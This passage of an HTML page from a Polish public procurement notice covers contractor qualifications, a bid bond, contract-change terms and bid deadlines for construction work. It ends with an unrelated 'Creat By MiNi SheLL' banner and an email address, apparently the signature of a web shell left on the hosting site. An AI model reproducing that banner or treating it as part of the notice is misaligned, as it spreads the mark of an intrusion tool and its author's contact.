spełniony, jeżeli wykonawca wykaże, że dysponuje lub będzie dysponował projektantem lub projektantami, posiadających uprawnienia w specjalności architektonicznej lub konstrukcyjno-budowlanej bez ograniczeń; w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych bez ograniczeń; w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych odpowiadające wymaganiom określonym w ustawie Prawo budowlane lub odpowiadające im ważne uprawnienia, w zakresie adekwatnym do przedmiotu zamówienia, które zostały wydane na podstawie wcześniej obowiązujących przepisów lub przepisów nie będących prawem krajowym.<br/>•	Zamawiający uzna ww. warunek za spełniony, jeżeli wykonawca wykaże, że dysponuje lub będzie dysponował co najmniej 6 pracownikami budowlanymi zatrudnionymi na podstawie umowy o pracę.<br/>•	Zamawiający uzna ww. warunek za spełniony, jeżeli Wykonawca wykaże, że dysponuje następującym potencjałem technicznym:<br/>•	samochód HDS o ładowności min. 8 Mg; <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> §2.Część II<br/>Wadium zostało ustalone w wysokości 40 000,00 złotych (czterdzieści tysięcy zł 00/100) <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.Zmiana treści niniejszej umowy może nastąpić wyłącznie w formie pisemnej, pod rygorem nieważności, przy<br/>uwzględnieniu postanowień ustawy Prawo zamówień publicznych. 2.Strony mają prawo do przedłużenia terminu<br/>zakończenia robót/przedmiotu umowy wyłącznie w przypadku uzyskania zgody z Programu Rządowego Fundusz Polski<br/>Ład: Programu Inwestycji Strategicznych. 3.Wykonawca jest uprawniony do żądania zmiany Umowy w zakresie materiałów,<br/>parametrów technicznych, technologii wykonania robót budowlanych, sposobu i zakresu wykonania przedmiotu Umowy za<br/>zgodą Projektanta i przy akceptacji Zamawiającego w następujących sytuacjach: a)konieczności zrealizowania jakiejkolwiek<br/>części robót, objętej przedmiotem Umowy, przy zastosowaniu odmiennych rozwiązań technicznych lub technologicznych,<br/>niż wskazane w Dokumentacji projektowej, a wynikających ze stwierdzonych Wad tej Dokumentacji lub zmiany stanu<br/>prawnego w oparciu, o który je przygotowano lub protestów społecznych gdyby zastosowanie przewidzianych rozwiązań<br/>groziło niewykonaniem lub nienależytym wykonaniem przedmiotu Umowy, b)konieczności realizacji robót wynikających z<br/>wprowadzenia w Dokumentacji projektowej zmian uznanych za nieistotne odstępstwo od projektu budowlanego,<br/>wynikających z art. 36a ust. 5 ustawy Prawo budowlane (Dz. U z 2016r. poz. 290 z późniejszymi zm.), c)wystąpienia<br/>warunków geologicznych, geotechnicznych lub hydrologicznych odbiegających w sposób istotny od przyjętych w<br/>Dokumentacji projektowej <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-07-18 08:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę za pomocą Platformy e-Zamówienia</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-07-18 09:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-08-16</span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: </h3> <p class="mb-0">Część 1 : <span class="normal">Tak</span></p> <p class="mb-0">Część 2 : <span class="normal">Tak</span></p>

Creat By MiNi SheLL
Email: jattceo@gmail.com